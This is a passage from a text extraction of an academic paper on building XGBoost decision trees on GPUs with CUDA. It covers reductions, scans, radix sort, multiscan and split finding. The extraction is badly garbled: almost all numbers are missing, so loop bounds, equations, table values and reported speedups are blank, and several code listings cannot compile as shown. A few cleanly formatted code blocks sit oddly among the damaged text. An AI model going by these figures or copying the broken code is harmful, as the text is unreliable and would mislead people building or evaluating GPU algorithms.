considerably behind those of cub/thrust. at the time of writing this paper opencl was not a practical option for this type of algorithm. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ execution model cuda code is written as a kernel to be executed by many thousands of threads. all threads execute the same kernel function but their behaviour may be distinguished through a unique thread id. listing shows an example of kernel adding values from two arrays into an output array. indexing is determined by the global thread id and any unused threads are masked off with a branch statement. listing example cuda kernel __global__ void example(float �d_a, float �d_b, float �d_output, int n){ //calculate global thread index //blockidx.x - the current thread block number //blockdim.x - the thread block size //threadidx.x - the thread index within the current block int global_tid = blockidx.x � blockdim.x + threadidx.x; if(global_tid < n){ d_output[global_tid] = d_a[global_tid] + d_b[global_tid]; } } threads are grouped according to thread blocks that typically each contain some multiple of threads. a group of threads is known as a warp. thread blocks are queued for execution on hardware streaming multiprocessors. streaming multiprocessors switch between different warps within a block during program execution in order to hide latency. global memory latency may be hundreds of cycles and hence it is important to launch sufficiently many warps within a thread block to facilitate latency hiding. a thread block provides no guarantees about the order of thread execution unless explicit memory synchronisation barriers are used. synchronisation across thread blocks is not generally possible within a single kernel launch. device-wide synchronisation is achieved by multiple kernel launches. for example, if a global synchronisation barrier is required within a kernel, the kernel must be separated into two distinct kernels where synchronisation occurs between the kernel launches. memory architecture cuda exposes three primary tiers of memory for reading and writing. 
device-wide global memory, thread block accessible shared memory and thread local registers. � global memory: global memory is accessible by all threads and has the highest latency. input data, output data and large amounts of working memory are typically stored in global memory. global memory can be copied from the device (i.e. the gpu) to the host computer and vice versa. bandwidth of host/device transfers is much slower mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ than that of device/device transfers and should be avoided if possible. global memory is accessed in byte cache lines on current gpus. memory accesses should be coalesced in order to achieve maximum bandwidth. coalescing refers to the grouping of aligned memory load/store operations into a single transaction. for example, a fully coalesced memory read occurs when a warp of threads loads contiguous byte words ( bytes). fully uncoalesced reads (typical of gather operations) can limit device bandwidth to less than % of peak bandwidth (harris, ). � shared memory: kb of shared memory is available to each thread block. shared memory is accessible by all threads in the block and has a significantly lower latency than global memory. it is typically used as working storage within a thread block and sometimes described as a ‘programmer-managed cache.’ � registers: a finite number of local registers is available to each thread. operations on registers are generally the fastest. threads within the same warp may read/write registers from other threads in the warp through intrinsic instructions such as shuffle or broadcast (nvidia, ). parallel primitives graphicsprocessingunitprimitivesaresmall algorithms usedasbuildingblocksinmassively parallel algorithms. while many data parallel tasks can be expressed with simple programs without them, gpu primitives may be used to compose more complicated algorithms while retaining high performance, readability and reliability. understanding which specific tasks can be achieved using parallel primitives and the relative performance of gpu primitives as compared to their cpu counterparts is key to designing effective gpu algorithms. reduction a parallel reduction reduces an array of values into a single value using a binary-associative operator. given a binary-associative operator and an array of elements the reduction returns ða a � � � an� Þ. note that floating point addition is not strictly associative. this means a sequential reduction operation will likely result in a different answer to a parallel reduction (the same applies to the scan operation described below). this is discussed in greater detail in ‘floating point precision.’ the reduction operation is easy to implement in parallel by passing partial reductions up a tree, taking o(logn) iterations given n input items and n processors. this is illustrated in fig. . in practice, gpu implementations of reductions do not launch one thread per input item but instead perform parallel reductions over ‘tiles’ of input items then sum the tiles together sequentially. the size of a tile varies according to the optimal granularity for a given hardware architecture. reductions are also typically tiered into three layers: warp, block and kernel. individual warps can very efficiently perform partial reductions over items using shuffle instructions introduced from nvidia’s kepler gpu architecture onwards. 
as smaller reductions can be combined into larger reductions by simply applying the binary associative operator on the outputs, these smaller warp reductions can be combined together to get the reduction for the entire tile. the thread block can mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ iterate over many input tiles sequentially, summing the reduction from each. when all thread blocks are finished the results from each are summed together at the kernel level to produce the final output. listing shows code for a fast warp reduction using shuffle intrinsics to communicate between threads in the same warp. the ‘shuffle down’ instruction referred to in listing simply allows the current thread to read a register value from the thread d places to the left, so long as that thread is in the same warp. the complete warp reduction algorithm requires five iterations to sum over items. listing warp reduction __device__ float warp_reduce(float x) { for (int d = ; d > ; d /= ) x += __shfl_down(x, d); return x; } reductions are highly efficient operations on gpus. an implementation is given in harris ( ) that approaches the maximum bandwidth of the device tested. parallel prefix sum (scan) the prefix sum takes a binary associative operator (most commonly addition) and applies it to an array of elements. given a binary associative operator and an array of elements the prefix sum returns ½a ; ða a Þ; :::; ða a ::: an� Þ�. a prefix sum is an example of a calculation which seems inherently serial but has an efficient parallel algorithm: the blelloch scan algorithm. let us consider a simple implementation of a parallel scan first, as described in hillis & steele ( ). it is given in algorithm . figure shows it in operation: we apply a simple scan with the addition operator to an array of ’s. given one thread for each input element the scan takes log n ¼ iterations to complete. the algorithm performs o(nlog n) addition operations. given that a sequential scan performs only n addition operations, the simple parallel scan is not work efficient. a work efficient parallel algorithm will perform the same number figure sum parallel reduction. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of operations as the sequential algorithm and may provide significantly better performance in practice. a work efficient algorithm is described in blelloch ( ). the algorithm is separated into two phases, an ‘upsweep’ phase similar to a reduction and a ‘downsweep’ phase. we give pseudocode for the upsweep (algorithm ) and downsweep (algorithm ) phases by following the implementation in harris, sengupta & owens ( ). figure simple parallel scan example. algorithm simple scan for d= to log n do for k= to n- in parallel do if k d- then x[k] := x[k - d- ] + x[k] end end end algorithm blelloch scan—upsweep offset = for d= log n to do for k= to n- in parallel do if k < d- then ai = offset � ( � k + ) - bi = offset � ( � k + ) - x[bi] = x[bi] + x[ai] end end offset = offset * end mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figures and show examples of the work efficient blelloch scan, as an exclusive scan (the sum for a given item excludes the item itself). 
solid lines show summation with the previous item in the array, dotted lines show replacement of the previous item with the new value. o(n) additions are performed in both the upsweep and downsweep phase resulting in the same work efficiency as the serial algorithm. a segmented variation of scan that processes contiguous blocks of input items with different head flags can be easily formulated. this is achieved by creating a binary associative operator on key value pairs. the operator tests the equality of the keys and sums the values if they belong to the same sequence. this is discussed further in ‘scan and reduce on multiple sequences.’ figure blelloch scan upsweep example. algorithm blelloch scan—downsweep offset ¼ log n� x[n - ] := for d= to log n do for k= to n- in parallel do if k < d- then ai = offset � ( � k + ) - bi = offset � ( � k + ) - t = x[ai] x[ai] = x[bi] x[bi] = x[bi] + t end end offset = offset/ end mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a scan may also be implemented using warp intrinsics to create fast item prefix sums based on the simple scan in fig. . code for this is shown in listing . although the simple scan algorithm is not work efficient, we use this approach for small arrays of size . listing warp scan __device__ float warp_scan(float x) { int lane_id = threadidx.x % ; for (int d = ; d < ; d �= ){ float tmp = __shfl_up(x, d); if (lane_id >= offset){ x += tmp; } } return x; } radix sort radix sorting on gpus follows from the ability to perform parallel scans. a scan operation may be used to calculate the scatter offsets for items within a single radix digit as described in algorithm and fig. . flagging all ‘ ’ digits with a one and performing an exclusive scan over these flags gives the new position of all zero digits. all ‘ ’ digits must be placed after all ‘ ’ digits, therefore the final positions of the ‘ ’s can be calculated as the exclusive scan of the ‘ ’s plus the total number of ‘ ’s. the exclusive scan of ‘ ’ digits does not need to be calculated as it can be inferred from the array index and the exclusive scan of ‘ ’s. for example, at index (using -based indexing), if our exclusive scan shows a sum of ‘ ’s, then there must be two ‘ ’s because a digit can only be or . figure blelloch scan downsweep example. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the basic radix sort implementation only sorts unsigned integers but this can be extended to correctly sort signed integers and floating point numbers through simple bitwise transformations. fast implementations of gpu radix sort perform a scan over many radix bits in a single pass. merrill & grimshaw ( ) show a highly efficient and practical implementation of gpu radix sorting. they show speedups of � over a core cpu and claim to have the fastest sorting implementation for any fully programmable microarchitecture. algorithm radix sort pass input :x output :y for i = to n - in parallel do f[i] := bit_flip(x[i]) end s := exclusive_scan(f) r := s[n - ] + f[n - ] for i = to n - in parallel do if x[i] = then a[i] := s[i] else if x[i] = then a[i] := i - s[i] + r end for i = to n - in parallel do y[a[i]] := x[i] end figure radix sort example. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
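To make the structure of a single radix sort pass concrete, the following host-side sketch partitions an array of keys by one binary digit using Thrust primitives; it mirrors the flag, exclusive-scan and scatter steps of the pseudocode above. The function name radix_sort_pass is illustrative, the code assumes compilation with nvcc's extended-lambda support, and production implementations (such as the CUB routines used later in this paper) scan several radix bits per pass.

#include <thrust/device_vector.h>
#include <thrust/device_ptr.h>
#include <thrust/for_each.h>
#include <thrust/scan.h>
#include <thrust/execution_policy.h>
#include <thrust/iterator/counting_iterator.h>

// One pass of a binary radix sort (illustrative only): stably partitions
// 'keys' by the digit at position 'bit' using a flag -> exclusive scan ->
// scatter sequence, as in the radix sort pass pseudocode.
void radix_sort_pass(thrust::device_vector<unsigned int>& keys, int bit) {
  const int n = static_cast<int>(keys.size());
  thrust::device_vector<int> is_zero(n);       // 1 where the current digit is 0
  thrust::device_vector<int> zeros_before(n);  // exclusive scan of is_zero
  thrust::device_vector<unsigned int> out(n);

  unsigned int* keys_p = thrust::raw_pointer_cast(keys.data());
  int* is_zero_p = thrust::raw_pointer_cast(is_zero.data());

  // Flag items whose current digit is 0.
  thrust::for_each(thrust::device,
                   thrust::counting_iterator<int>(0),
                   thrust::counting_iterator<int>(n),
                   [=] __device__ (int i) {
                     is_zero_p[i] = ((keys_p[i] >> bit) & 1u) == 0u ? 1 : 0;
                   });

  // The exclusive scan gives each '0' digit its output position.
  thrust::exclusive_scan(is_zero.begin(), is_zero.end(), zeros_before.begin());
  const int total_zeros = zeros_before[n - 1] + is_zero[n - 1];

  // Scatter: '0's keep their scanned position, '1's are placed after all '0's
  // while preserving their relative order (index minus zeros seen so far).
  int* zeros_before_p = thrust::raw_pointer_cast(zeros_before.data());
  unsigned int* out_p = thrust::raw_pointer_cast(out.data());
  thrust::for_each(thrust::device,
                   thrust::counting_iterator<int>(0),
                   thrust::counting_iterator<int>(n),
                   [=] __device__ (int i) {
                     int dest = is_zero_p[i]
                                    ? zeros_before_p[i]
                                    : total_zeros + (i - zeros_before_p[i]);
                     out_p[dest] = keys_p[i];
                   });
  keys = out;
}

Repeating this pass from the least to the most significant bit yields a full (stable) radix sort of the keys.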
https://peerj.com/computer-science/ scan and reduce on multiple sequences variations on scan and reduce consider multiple sequences contained within the same input array and identified by key flags. this is useful for building decision trees as the data can be repartitioned into smaller and smaller groups as we build the tree. we will describe an input array as containing either ‘interleaved’ or ‘segmented’ sequences. table shows an example of two interleaved sequences demarcated by flags. its values are mixed up and do not reside contiguously in memory. this is in contrast to table , with two ‘segmented’ sequences. the segmented sequences reside contiguously in memory. segmented scan a scan can be performed on the sequences from table using the conventional scan algorithm described in ‘parallel prefix sum (scan)’ by modifying the binary associative operator to accept key value pairs. listing shows an example of a binary associative operator that performs a segmented summation. it resets the sum when the key changes. listing segmented sum operator keyvalue op(keyvalue a, keyvalue b){ if(a.key == b.key){ b.value += a.value; return b; } else{ return b; } } segmented reduce a segmented reduction can be implemented efficiently by applying the segmented scan described above and collecting the final value of each sequence. this is because the last element in a scan is equivalent to a reduction. table interleaved sequences. sequence id values values scan table segmented sequences. sequence id values values scan mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interleaved sequences: multireduce a reduction operation on interleaved sequences is commonly described as a multireduce operation. to perform a multireduce using the conventional tree algorithm described in ‘reduction’ a vector of sums can be passed up the tree instead of a single value, with one sum for each unique sequence. as the number of unique sequences or ‘buckets’ increases, this algorithm becomes impractical due to limits on temporary storage (registers and shared memory). a multireduce can alternatively be formulated as a histogram operation using atomic operations in shared memory. atomic operations allow multiple threads to safely read/write a single piece of memory. a single vector of sums is kept in shared memory for the entire thread block. each thread can then read an input value and increment the appropriate sum using atomic operations. when multiple threads contend for atomic read/write access on a single piece of memory they are serialised. therefore, a histogram with only one bucket will result in the entire thread block being serialised (i.e. only one thread can operate at a time). as the number of buckets increases this contention is reduced. for this reason the histogram method will only be appropriate when the input sequences are distributed over a large number of buckets. interleaved sequences: multiscan a scan operation performed on interleaved sequences is commonly described as a multiscan operation. a multiscan may be implemented, like multireduce, by passing a vector of sums as input to the binary associative operator. this increases the local storage requirements proportionally to the number of buckets. 
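Returning briefly to the multireduce case, the shared-memory histogram approach described above can be sketched as the following CUDA kernel. This is a minimal illustration rather than the implementation used in this work: the kernel name is illustrative, a single float value is reduced per item for brevity, and dynamic shared memory of n_buckets * sizeof(float) bytes is assumed at launch.

// Histogram-style multireduce: each thread block accumulates per-bucket sums
// in shared memory with atomics, then flushes its partial sums into the
// global per-bucket totals.
__global__ void multireduce_histogram(const float* values, const int* bucket_id,
                                      int n, int n_buckets, float* bucket_sums) {
  extern __shared__ float local_sums[];  // one partial sum per bucket

  // Zero the shared-memory histogram.
  for (int b = threadIdx.x; b < n_buckets; b += blockDim.x)
    local_sums[b] = 0.0f;
  __syncthreads();

  // Grid-stride loop: every thread accumulates its items into shared memory.
  for (int i = blockIdx.x * blockDim.x + threadIdx.x; i < n;
       i += gridDim.x * blockDim.x)
    atomicAdd(&local_sums[bucket_id[i]], values[i]);
  __syncthreads();

  // Add this block's partial sums to the global totals.
  for (int b = threadIdx.x; b < n_buckets; b += blockDim.x)
    atomicAdd(&bucket_sums[b], local_sums[b]);
}

It would be launched as multireduce_histogram<<<num_blocks, 256, n_buckets * sizeof(float)>>>(values, bucket_id, n, n_buckets, bucket_sums), with bucket_sums zero-initialised beforehand. Contention on the shared-memory atomics falls as the number of buckets grows, which is why this approach is only appropriate when the input sequences are spread over many buckets.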
general purpose multiscan for gpus is discussed in eilers ( ) with the conclusion that ‘multiscan cannot be recommended as a general building block for gpu algorithms.’ however, highly practical implementations exist that are efficient up to a limited number of interleaved buckets, where the vector of sums approach does not exceed the capacity of the device. the capacity of the device in this case refers to the amount of registers and shared memory available for each thread to store and process a vector. merill and grimshaw’s optimised radix sort implementation (merrill & nvidia-labs, ; merrill & grimshaw, ), mentioned in ‘radix sort,’ relies on an eight-way multiscan in order to calculate scatter addresses for up to bits at a time in a single pass. floating point precision the cpu implementation of the xgboost algorithm represents gradient/hessian pairs using two bit floats. all intermediate summations are performed using bit doubles to control loss of precision from floating point addition. this is problematic when using gpus as the number of intermediate values involved in a reduction scales with the input size. using doubles significantly increases the usage of scarce registers and shared memory; moreover, gaming gpus are optimised for bit floating point operations and give relatively poor double precision throughput. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ table shows the theoretical gflops of two cards we use for benchmarking. the single precision gflops are calculated as � number of cuda cores � core clock speed (in ghz), where the factor of represents the number of operations per required fma (fused-multiply-add) instruction. both these cards have times more single precision alus (arithmetic logic units) than double precision alus, resulting in / the theoretical double precision performance. therefore, an algorithm relying on double precision arithmetic will have severely limited performance on these gpus. we can test the loss of precision from bit floating point operations to see if double precision is necessary by considering bit parallel and sequential summation, summing over a large array of random numbers. sequential double precision summation is used as the baseline, with the error measured as the absolute difference from the baseline. the experiment is performed over million random numbers between - and , with repeats. the mean error and standard deviation are reported in table . the thrust library is used for parallel gpu reduction based on single precision operations. the bit parallel summation shows dramatically superior numerical stability compared to the bit sequential summation. this is because the error of parallel summation grows proportionally to o(logn), as compared to o(n) for sequential summation (higham, ). the parallel reduction algorithm from fig. is commonly referred to as ‘pairwise summation’ in literature relating to floating point precision. the average error of . over million items shown in table is more than acceptable for the purposes of gradient boosting. the results also suggests that the sequential summation within the original xgboost could be safely performed in single precision floats. a mean error of . over million items is very unlikely to be significant compared to the noise typically present in the training sets of supervised learning tasks. 
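The precision comparison above can be reproduced with a short test along the following lines; this is a sketch rather than the exact benchmark code, and the array size and random values are placeholders. Both single precision sums are compared against a double precision sequential baseline, with the parallel (pairwise) reduction performed on the device by Thrust.

#include <thrust/device_vector.h>
#include <thrust/reduce.h>
#include <cstdio>
#include <cstdlib>
#include <cmath>
#include <vector>

// Compare single precision sequential summation and single precision parallel
// reduction against a double precision sequential baseline.
int main() {
  const int n = 10'000'000;  // placeholder size for the sketch
  std::vector<float> h(n);
  for (int i = 0; i < n; ++i)
    h[i] = 2.0f * static_cast<float>(rand()) / RAND_MAX - 1.0f;  // values in [-1, 1]

  double baseline = 0.0;    // double precision sequential baseline
  float sequential = 0.0f;  // single precision sequential sum
  for (int i = 0; i < n; ++i) {
    baseline += h[i];
    sequential += h[i];
  }

  // Single precision parallel reduction on the GPU.
  thrust::device_vector<float> d(h.begin(), h.end());
  float parallel = thrust::reduce(d.begin(), d.end(), 0.0f);

  std::printf("sequential float error: %g\n", std::fabs(sequential - baseline));
  std::printf("parallel float error:   %g\n", std::fabs(parallel - baseline));
  return 0;
}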
building tree classifiers on gpus graphics processing unit-accelerated decision trees and forests have been studied as early as in sharp ( ) for the purpose of object recognition, achieving speedups of up to � for this task. decision forests were mapped to a -d texture array and trained/evaluated using gpu pixel and vertex shaders. a more general purpose random forest implementation is described in grahn et al. ( ) showing speedups of table gpu gflops. gpu single precision double precision gtx (maxwell) , titan x (pascal) , table bit floating point precision. algorithm mean error sd sequential . . parallel . . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ up to � over state-of-the-art cpu implementations for large numbers of trees. the authors use an approach where one gpu thread is launched to construct each tree in the ensemble. a decision tree construction algorithm using cuda based on the sprint decision tree inducer is described in chiu, luo & yuan ( ). no performance results are reported. another decision tree construction algorithm is described in lo et al. ( ). they report speedups of – � over weka’s java-based implementation of c . (quinlan, ), called j , and � over sprint. their algorithm processes one node at a time and as a result scales poorly at higher tree depths due to higher per-node overhead as compared to a cpu algorithm. nasridinov, lee & park ( ) describe a gpu-accelerated algorithm for id decision tree construction, showing moderate speedups over weka’s id implementation. nodes are processed one at a time and instances are resorted at every node. strnad & nerat ( ) devise a decision tree construction algorithm that stores batches of nodes in a work queue on the host and processes these units of work on the gpu. they achieve speedups of between � and � on large data sets as compared to a multithreaded cpu implementation. instances are resorted at every node (strnad & nerat, ). our work has a combination of key features differentiating it from these previous approaches. first, our implementation processes all nodes in a level concurrently, allowing it to scale beyond trivial depths with near constant run-time. a gpu tree construction algorithm that processes one node at a time will incur a nontrivial constant kernel launch overhead for each node processed. additionally, as the training set is recursively partitioned at each level, the average number of training examples in each node decreases rapidly. processing a small number of training examples in a single gpu kernel will severely underutilise the device. this means the run-time increases dramatically with tree depth. to achieve state-of-the-art results in data mining competitions we found that users very commonly required tree depths of greater than in xgboost. this contradicts the conventional wisdom that a tree depth of between and is sufficient for most boosting applications (friedman, hastie & tibshirani, ). our approach of processing all nodes on a level concurrently is far more practical in this setting. secondly, our decision tree implementation is not a hybrid cpu/gpu approach and so does not use the cpu for computation. we find that all stages of the tree construction algorithm can be efficiently completed on the gpu. this was a conscious design decision in order to reduce the bottleneck of host/device memory transfers. 
at the time of writing, host/device transfers are limited to approximately gb/s by the bandwidth of the gen pcie standard. the titan x gpu we use for benchmarking has an on-device memory bandwidth of gb/s, a factor of times greater. consequently, applications that move data back and forward between the host and device will not be able to achieve peak performance. building the entire decision tree in device memory has the disadvantage that the device often has significantly lower memory capacity than the host. despite this, we show that it is possible to process some very large benchmark datasets entirely in device memory on a commodity gpu. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thirdly, our algorithm implements the sparsity aware tree construction method introduced by xgboost. this allows it to efficiently process sparse input matrices in terms of run-time and memory usage. this is in contrast to previous gpu tree construction algorithms. additionally, our implementation is provided as a part of a fully featured machine learning library. it implements regression, binary classification, multiclass classification and ranking through the generalised gradient boosting framework of xgboost and has an active user base. no published implementations exist for any of the existing gpu tree construction algorithms described above, making direct comparison to the approach presented in this work infeasible. parallel tree construction our algorithm builds a single decision tree for a boosting iteration by processing decision tree nodes in a level-wise manner. at each level we search for the best split within each leaf node, update the positions of training instances based on these new splits and then repartition data if necessary. processing an entire level at a time allows us to saturate the gpu with the maximum amount of work available in a single iteration. our algorithm performs the following three high level phases for each tree level until the maximum tree depth is reached: ( ) find splits, ( ) update node positions, and ( ) sort node buckets (if necessary). phase : find splits the first phase of the algorithm finds the best split for each leaf node at the current level. data layout to facilitate enumeration through all split points, the feature values should be kept in sorted order. hence, we use the device memory layout shown in tables and . each feature value is paired with the id of the instance it belongs to as well as the leaf node it currently resides in. data are stored in sparse column major format and instance ids are used to map back to gradient pairs for each instance. all data are stored in arrays in device memory. the tree itself can be stored in a fixed length device array as it is strictly binary and has a maximum depth known ahead of time. block level parallelism given the above data layout notice that each feature resides in a contiguous block and may be processed independently. in order to calculate the best split for the root node of the tree, we greedily select the best split within each feature, delegating a single thread block per feature. the best splits for each feature are then written out to global memory and are reduced by a second kernel. a downside of this approach is that when the number of features is not enough to saturate the number of streaming multiprocessors—the hardware units responsible for executing a thread block—the device will not be fully utilised. 
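A minimal sketch of the device-side layout described above is given below; the type and member names (DeviceMatrix, GradientPair, col_ptr) are illustrative rather than the actual structures of the xgboost GPU plugin.

#include <thrust/device_vector.h>

// Per-instance gradient statistics used by the split gain calculation.
struct GradientPair {
  float grad;  // g_i: first-order derivative of the loss
  float hess;  // h_i: second-order derivative of the loss
};

// Sparse, column-major layout of the training matrix in device memory.
// There is one entry per non-missing feature value, kept sorted by value
// within each feature column; each entry carries the instance it came from
// and the leaf node that instance currently occupies.
struct DeviceMatrix {
  thrust::device_vector<float> feature_value;
  thrust::device_vector<int>   instance_id;  // maps back to gradient pairs
  thrust::device_vector<int>   node_id;      // leaf the instance resides in
  // Start offset of each feature column inside the arrays above
  // (column i occupies [col_ptr[i], col_ptr[i + 1])).
  thrust::device_vector<int>   col_ptr;
  // One gradient pair per training instance, indexed by instance_id.
  thrust::device_vector<GradientPair> gradient_pairs;
};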
calculating splits in order to calculate the best split for a given feature we evaluate eq. ( ) at each possible split location. this depends on (gl, hl) and (gr, hr). we obtain (gl, hl) mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from a parallel scan of gradient pairs associated with each feature value. (gr, hr) can be obtained by subtracting (gl, hl) from the node total which we know from the parent node. the thread block moves from left to right across a given feature, consuming ‘tiles’ of input. a tile herein refers to the set of input items able to be processed by a thread block in one iteration. table gives an example of a thread block with four threads evaluating a tile with four items. for a given tile, gradient pairs are scanned and all splits are evaluated. each thread warp performs a reduction to find the best local split and keeps track of the current best feature value and accompanying gradient statistics in shared memory. at the end of processing the feature, another reduction is performed over all the warps’ best items to find the best split for the feature. missing values the original xgboost algorithm accounts for missing values by scanning through the input values twice as described in ‘xgboost: handling missing values’—once in the forwards direction and once in the reverse direction. an alternative method used by our gpu algorithm is to perform a sum reduction over the entire feature before scanning. the gradient statistics for the missing values can then be calculated as the node sum statistics minus the reduction. if the sum of the gradient pairs from the missing values is known, only a single scan is then required. this method was chosen as the cost of a reduction can be significantly less than performing the second scan. table device memory layout: gradient pairs. instance id gradient pair p p p p table device memory layout: feature values. f f f node id instance id feature value . . . . . . . . table a single thread block evaluating splits. thread block ⇒ b b b b f instance id feature value . . . . . . . . gradient pair p p p p p p p p mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ node buckets so far the algorithm description only explains how to find a split at the first level where all instances are bucketed into a single node. a decision tree algorithm must, by definition, separate instances into different nodes and then evaluate splits over these subsets of instances. this leaves us with two possible options for processing nodes. the first is to leave all data instances in their current location, keeping track of which node they currently reside in using an auxiliary array as shown in table . when we perform a scan across all data values we keep temporary statistics for each node. we therefore scan across the array processing all instances as they are interleaved with respect to their node buckets. this is the method used by the cpu xgboost algorithm. we also perform this method on the gpu, but only to tree depths of around . this interleaved algorithm is fully described in ‘interleaved algorithm: finding a split.’ the second option is to radix sort instances by their node buckets at each level in the tree. 
this second option is described fully in ‘sorting algorithm: finding a split.’ briefly, data values are first ordered by their current node and then by feature values within their node buckets as shown in table . this transforms the interleaved scan (‘multiscan’) problem described above into a segmented scan, which has constant temporary storage requirements and thus scales to arbitrary depths in a gpu implementation. in our implementation, we use the interleaved method for trees of up to depth and then switch to the sorting version of the algorithm. avoiding the expensive radix sorting step for as long as possible can provide speed advantages, particularly when building small trees. the maximum number of leaves at depth is . at greater depths there are insufficient shared memory resources and the exponentially increasing run-time begins to be uncompetitive. interleaved algorithm: finding a split in order to correctly account for missing values a multireduce operation must be performed to obtain the sums within interleaved sequences of nodes. a multiscan is table interleaved node buckets. f f f node id instance id feature value . . . . . . . . table sorted node buckets. f f f node id instance id feature value . . . . . . . . mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ then performed over gradient pairs. following that, unique feature values are identified and gain values calculated to identify the best split for each node. we first discuss the multireduce and multiscan operations before considering how to evaluate splits. multireduce and multiscan algorithms and outline the approach used for multireduce/multiscan at the thread block level. our multiscan/multireduce approach is formulated around sequentially executing fast warp synchronous scan/reduce operations for each bucket. passing vectors of items to the binary associative operator is not generally possible given the number of buckets and the limited temporary storage. this was discussed in ‘scan and reduce on multiple sequences.’ we instead perform warp level multiscan operations. listing shows how a -thread warp can perform a multiscan by masking off non-active node buckets and performing a normal warp scan for each node bucket. the function ‘warpexclusivescan()’ herein refers to an exclusive version of the warp scan described in listing . listing warp multiscan gpu_gpair gpair; //gradient values for current item int node_id; //node bucket of current item gpu_gpair exclusive_scan_output; for (int node = ; node < n_nodes; node++) { bool node_active = node_id == node; gpu_gpair scan_result; gpu_gpair node_sum; algorithm multireduce—thread block execution . an input tile is loaded. . each warp performs local reduction for each bucket, masking off items for the current bucket. . each warp adds its local reductions into shared memory. . the remaining tiles are processed. . the partial sums in shared memory are reduced by a single warp into the final node sums. algorithm multiscan—thread block execution . an input tile is loaded. . each warp performs local scans for each bucket, masking off items for the current bucket. . the sums from each local scan are placed into shared memory. . the partial sums in shared memory are scanned. . the scanned partial sums in shared memory are added back into the local values. . the running sum from the previous tile is added to the local values. . the remaining tiles are processed. mitchell and frank ( ), peerj comput. 
sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ //first argument is the scan input //result is placed in the second argument //warp sum is placed in the third argument warpexclusivescan(node_active ? gpair : gpu_gpair(), scan_result, node_sum); if (node_active) { exclusive_scan_output = scan_result; } } note that the number of warp reductions/scans performed over a warp of data increases exponentially with tree depth. this leads to an exponentially increasing run time relative to the depth of the tree, but is surprisingly performant even up to depth as warp synchronous reductions/scans using shuffle instructions are cheap to compute. they only perform operations on registers and incur no high latency reads or writes into global memory. the exclusive scan for the entire input tile is calculated from individual warp scans by performing the same multiscan operation over the sums of each warp scan and scattering the results of this back into each item. more detailed information on how to calculate a block-wide scan from smaller warp scan operations is given in nvidia ( ). evaluating splits there is one additional problem that must be solved. it arises as a consequence of processing node buckets in interleaved order. in a decision tree algorithm, when enumerating through feature values to find a split, we should not choose a split that falls between two elements with the same value. this is because a decision rule will not be able to separate elements with the same value. for a value to be considered as a split, the corresponding item must be the leftmost item with that feature value for that particular node (we could also arbitrarily take the rightmost value). because the node buckets are interleaved, it is not possible to simply check the item to the left to see if the feature value is the same—the item to the left of a given item may reside in a different node. to check if an item with a certain feature value is the leftmost item with that value in its node bucket, we can formulate a scan with a special binary associative operator. first, each item is assigned a bit vector~x of length n + where n is the number of buckets. if the item resides within bucket i then xi will be set to . if the item’s feature value is distinct from the value of the item directly to the left (irrespective of bucket) then xn+ is set to . all other bits are set to . we can then define a binary associative operator as follows: opð~a;~bÞ ¼ � ~b if bnþ ¼ ~a _~b ; otherwise ( ) mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bit xn+ acts as a segmentation flag, resetting the scan so many small scans are performed across groups of items with the same feature value. scanning the bucket flags with a logical or operator determines which node buckets are represented in the items to the left of the current item. therefore, within a group of items with the same feature value, if the current item’s bucket flag is set to for the bucket it resides in, the item represents the leftmost item with that value in its bucket. this item can then be used as a split point. in practice, a bit integer is used as the bit vector in order to hold a maximum of bits at the sixth level of the tree (the maximum number of active nodes at this level + for the segmentation flag). the operator is formulated according to listing in c++ code. 
moreover, when applying this interleaved algorithm we cannot choose the split value as the halfway point between two training examples: we do not know the value of the item to the left within the current node, only if it is the same as the current item or not. the split value is accordingly calculated as the current value minus some small constant. this distinction in the split value does not affect accuracy in practice. listing binary associative operator bitflagset op(const bitflagset &a, const bitflagset &b) { if (check_bit(b, )) { return b; } else { return a | b; } } complete algorithm given a reduction, scan and the above method for finding unique feature values we have all the machinery necessary to enumerate splits and select the best. the complete algorithm for a thread block processing a single feature at a given tree level is shown in algorithm . the output of this algorithm contains the best split for each leaf node for a given feature. each thread block outputs the best splits for its assigned feature. these splits are then further reduced by a global kernel to find the best splits for any feature. sorting algorithm: finding a split the sorting implementation of the split finding algorithm operates on feature value data grouped into node buckets. given data sorted by node id first and then feature values second we can perform segmented scan/reduce operations over an entire feature only needing a constant amount of temporary storage. the segmented reduction to find gradient pair sums for each node is implemented as a segmented sum scan, storing the final element from each segment as the node sum. mitchell and frank ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ another segmented scan is then 